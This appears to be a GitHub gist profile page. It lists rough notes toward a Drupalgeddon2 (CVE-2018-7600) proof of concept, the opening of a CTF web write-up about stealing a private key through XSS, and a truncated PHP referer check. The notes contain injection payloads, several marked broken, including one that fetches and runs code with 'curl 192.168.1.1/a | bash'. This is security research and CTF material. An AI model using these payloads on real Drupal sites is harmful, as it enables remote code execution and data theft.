Skip to content

Instantly share code, notes, and snippets.

View bigshebang's full-sized avatar

Luke bigshebang

21 followers · 15 following
View GitHub Profile
@bigshebang
bigshebang / drupalgeddon2
Last active March 30, 2018 13:44
Attempting to make a poc for drupalgeddon2 (CVE-2018-7600 | SA-CORE-2018-002)
UNTESTED, just throwing around ideas
Code: $form['#validate'][] = function(){return system('id');};
Added as a param (unencoded): example.com/login.php?#validate[]=function(){return system('id');};
(BROKEN) URL Encoded: example.com%2Flogin.php%3F%23%24form%5B%27%23validate%27%5D%5B%5D%3Dfunction%28%29%7Breturn%20system%28%27id%27%29%3B%7D%3B
(BROKEN) To make things more fun (execute curl 192.168.1.1/a | bash): example.com%2Flogin.php%3F%23%24form%5B%27%23validate%27%5D%5B%5D%3Dfunction%28%29%7Breturn%20system%28%27curl%20192.168.1.1%2Fa%20%7C%20bash%27%29%3B%7D%3B
This is closer to working, still doesn't work though: curl -i -X POST -H "application/x-www-form-urlencoded" -d "name=admin&pass=adminz&form_id=user_login_block&op=Log+in&%23validate%5B%5D=function%28%29%7Breturn%20system%28%27sleep%2010%22%27%29%3B%7D%3B" "http://example.com/?q=node&destination=node"
@bigshebang
bigshebang / RC3 2016 CTF - Web 500 (Cachet) write up.md
Last active November 21, 2016 07:08

Web 500 (Cachet)

Scenario

We need you. Things have been crazy with all the leaks lately. Apparently somebody gave one of our clients a tip that Julian Assange has acquired some devastating data about the US government. Our client has asked us to get this data for them. They're saying they can sell this data and makes lots of money of off it or something. Doesn't matter, they're paying us as long as we can get the data for them. The only tip we have is that Julian has been using this new security and privacy focused messaging app called Cachet to communicate with the source of the leaked data. He's supposedly taken a liking to it and uses it pretty frequently. Our interns looked at it but haven't had any luck, so we need your expertise on this one.

TL;DR solution

Get XSS on user julianassange via the enc-msg POST param when sending him a message. Use this XSS to get his private key and passphrase (julianassange reads all messages sent to him). Then use this XSS to read the read.php for julianassange,

@bigshebang
bigshebang / referer_check.php
Last active November 21, 2016 06:41
legit referer check
function referer_good($id)
{
//if id isn't numeric can't be valid
if(!is_numeric($id))
return false;
$referer = "";
if(!empty($_SERVER['HTTP_REFERER']))
$referer = strtolower($_SERVER['HTTP_REFERER']);
else